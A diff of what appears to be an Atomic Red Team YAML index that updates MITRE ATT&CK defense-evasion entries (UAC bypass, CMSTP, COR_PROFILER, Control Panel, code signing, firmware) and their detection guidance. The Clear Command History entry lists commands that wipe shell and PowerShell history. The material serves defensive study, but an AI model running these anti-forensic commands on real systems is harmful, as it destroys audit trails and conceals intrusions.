created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
@@ -22284,7 +25906,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-25T19:57:54.510Z'
+ modified: '2020-07-22T21:36:52.458Z'
created: '2020-01-30T14:24:34.977Z'
x_mitre_platforms:
- Windows
@@ -22311,7 +25933,7 @@ defense-evasion:
x_mitre_effective_permissions:
- Administrator
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_defense_bypassed:
- Windows User Account Control
identifier: T1548.002
@@ -22531,7 +26153,7 @@ defense-evasion:
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
- CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
+ CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
id: attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49
type: attack-pattern
kill_chain_phases:
@@ -22560,7 +26182,7 @@ defense-evasion:
Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
- * To detect [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).
+ * To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).
x_mitre_platforms:
- Windows
identifier: T1218.003
@@ -22666,7 +26288,7 @@ defense-evasion:
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
- Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
type: attack-pattern
kill_chain_phases:
@@ -22836,41 +26458,64 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1070.003
url: https://attack.mitre.org/techniques/T1070/003
+ - source_name: Microsoft PowerShell Command History
+ url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7
+ description: Microsoft. (2020, May 13). About History. Retrieved September
+ 4, 2020.
+ - source_name: Sophos PowerShell command audit
+ url: https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit
+ description: jak. (2020, June 27). Live Discover - PowerShell command audit.
+ Retrieved August 21, 2020.
+ - source_name: Sophos PowerShell Command History Forensics
+ url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
+ description: Vikas, S. (2020, August 26). PowerShell Command History Forensics.
+ Retrieved September 4, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Clear Command History
description: |-
- In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.
+ In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
- These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
+ On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
- Adversaries can use a variety of methods to prevent their own commands from appear in these logs, such as clearing the history environment variable (unset HISTFILE), setting the command history size to zero (export HISTFILESIZE=0), manually clearing the history (history -c), or deleting the bash history file rm ~/.bash_history.
+ Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
+
+ On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
+
+ The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
+
+ Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
id: attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T21:31:03.043Z'
+ modified: '2020-10-16T18:09:48.686Z'
created: '2020-01-31T12:32:08.228Z'
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Vikas Singh, Sophos
+ - Emile Kenning, Sophos
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
x_mitre_defense_bypassed:
- Host forensic analysis
- Log analysis
- x_mitre_detection: User authentication, especially via remote terminal services
- like SSH, without new entries in that user's ~/.bash_history
- is suspicious. Additionally, the modification of the HISTFILE
- and HISTFILESIZE environment variables or the removal/clearing
- of the ~/.bash_history file are indicators of suspicious activity.
+ x_mitre_detection: |-
+ User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.
+
+ Monitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.
x_mitre_data_sources:
+ - Process command-line parameters
+ - PowerShell logs
- File monitoring
- Authentication logs
x_mitre_platforms:
- Linux
- macOS
+ - Windows
identifier: T1070.003
atomic_tests:
- name: Clear Bash history (rm)
@@ -23202,6 +26847,15 @@ defense-evasion:
elevation_required: true
T1078.004:
technique:
+ id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
+ description: |-
+ Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
+
+ Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
+ name: Cloud Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.004
@@ -23218,15 +26872,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
-
- Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
- id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -23237,21 +26882,8 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.729Z'
+ modified: '2020-10-19T16:01:22.090Z'
created: '2020-03-13T20:36:57.378Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -23259,32 +26891,22 @@ defense-evasion:
- SaaS
- Azure AD
- Office 365
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
+ or malicious behavior, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
atomic_tests: []
T1553.002:
technique:
- created: '2020-02-05T16:27:37.784Z'
- modified: '2020-02-10T19:51:01.601Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
- id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
- description: "Adversaries may create, acquire, or steal code signing materials
- to sign their malware or tools. Code signing provides a level of authenticity
- on a binary from the developer and a guarantee that the binary has not been
- tampered with. (Citation: Wikipedia Code Signing) The certificates used during
- an operation may be created, acquired, or stolen by the adversary. (Citation:
- Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
- Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001),
- this activity will result in a valid signature.\n\nCode signing to verify
- software on first run can be used on modern Windows and macOS/OS X systems.
- It is not used on Linux due to the decentralized nature of the platform. (Citation:
- Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass
- security policies that require signed code to execute on a system. "
- name: Code Signing
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1553.002
@@ -23301,18 +26923,41 @@ defense-evasion:
description: Shinotsuka, H. (2013, February 22). How Attackers Steal Private
Keys from Digital Certificates. Retrieved March 31, 2016.
source_name: Symantec Digital Certificates
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Code Signing
+ description: "Adversaries may create, acquire, or steal code signing materials
+ to sign their malware or tools. Code signing provides a level of authenticity
+ on a binary from the developer and a guarantee that the binary has not been
+ tampered with. (Citation: Wikipedia Code Signing) The certificates used during
+ an operation may be created, acquired, or stolen by the adversary. (Citation:
+ Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
+ Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001),
+ this activity will result in a valid signature.\n\nCode signing to verify
+ software on first run can be used on modern Windows and macOS/OS X systems.
+ It is not used on Linux due to the decentralized nature of the platform. (Citation:
+ Wikipedia Code Signing) \n\nCode signing certificates may be used to bypass
+ security policies that require signed code to execute on a system. "
+ id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-02-10T19:51:01.601Z'
+ created: '2020-02-05T16:27:37.784Z'
+ x_mitre_data_sources:
+ - Binary file metadata
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
x_mitre_detection: Collect and analyze signing certificate metadata on software
that executes within the environment to look for unusual certificate characteristics
and outliers.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- x_mitre_data_sources:
- - Binary file metadata
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Windows
atomic_tests: []
T1027.004:
technique:
@@ -23723,6 +27368,23 @@ defense-evasion:
name: powershell
T1542.002:
technique:
+ created: '2019-12-19T20:21:21.669Z'
+ modified: '2020-03-23T23:48:33.904Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4
+ description: |-
+ Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
+
+ Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
+ name: Component Firmware
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1542.002
@@ -23738,54 +27400,39 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Component Firmware
- description: |-
- Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
-
- Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.
- id: attack-pattern--791481f8-e96a-41be-b089-a088763083d4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-23T23:48:33.904Z'
- created: '2019-12-19T20:21:21.669Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_system_requirements:
- - Ability to update component device firmware from the host operating system.
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_detection: |-
- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
-
- Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
+ x_mitre_platforms:
+ - Windows
x_mitre_data_sources:
- Component firmware
- Process monitoring
- Disk forensics
- API monitoring
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
+
+ Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_system_requirements:
+ - Ability to update component device firmware from the host operating system.
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1218.002:
technique:
id: attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f
description: |-
- Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)
+ Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
- For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
+ Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
- Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
+ Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
+
+ Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)
name: Control Panel
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -23794,10 +27441,10 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1218.002
url: https://attack.mitre.org/techniques/T1218/002
- - url: https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx
+ - source_name: Microsoft Implementing CPL
description: M. (n.d.). Implementing Control Panel Items. Retrieved January
18, 2018.
- source_name: Microsoft Implementing CPL
+ url: https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx
- url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
description: Mercês, F. (2014, January 27). CPL Malware - Malicious Control
Panel Items. Retrieved January 18, 2018.
@@ -23810,12 +27457,18 @@ defense-evasion:
description: Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New
Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.
source_name: Palo Alto Reaver Nov 2017
+ - source_name: ESET InvisiMole June 2020
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:33:18.929Z'
+ modified: '2020-10-21T18:37:11.672Z'
created: '2020-01-23T19:59:52.630Z'
+ x_mitre_contributors:
+ - ESET
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -23826,15 +27479,15 @@ defense-evasion:
- Binary file metadata
- API monitoring
x_mitre_detection: |-
- Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)
+ Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace and HKEY_CLASSES_ROOT\CLSID\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
- * CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the Cpls and Extended Properties Registry keys of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}). (Citation: Microsoft Implementing CPL)
- * Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)
+ * CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)
+ * Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)
- Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)
+ Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)
x_mitre_defense_bypassed:
- Application control
x_mitre_permissions_required:
@@ -23842,7 +27495,7 @@ defense-evasion:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1218.002
atomic_tests:
- name: Control Panel Items
@@ -23890,8 +27543,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1578/002
- source_name: Mandiant M-Trends 2020
url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
- source_name: AWS CloudTrail Search
url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
@@ -23907,7 +27560,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-18T11:45:36.417Z'
+ modified: '2020-09-14T19:48:08.299Z'
created: '2020-05-14T14:45:15.978Z'
x_mitre_platforms:
- AWS
@@ -23984,8 +27637,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1578/001
- source_name: Mandiant M-Trends 2020
url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
- source_name: AWS Cloud Trail Backup API
url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
@@ -24014,7 +27667,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-19T14:45:59.618Z'
+ modified: '2020-09-14T19:48:08.293Z'
created: '2020-06-09T15:33:13.563Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
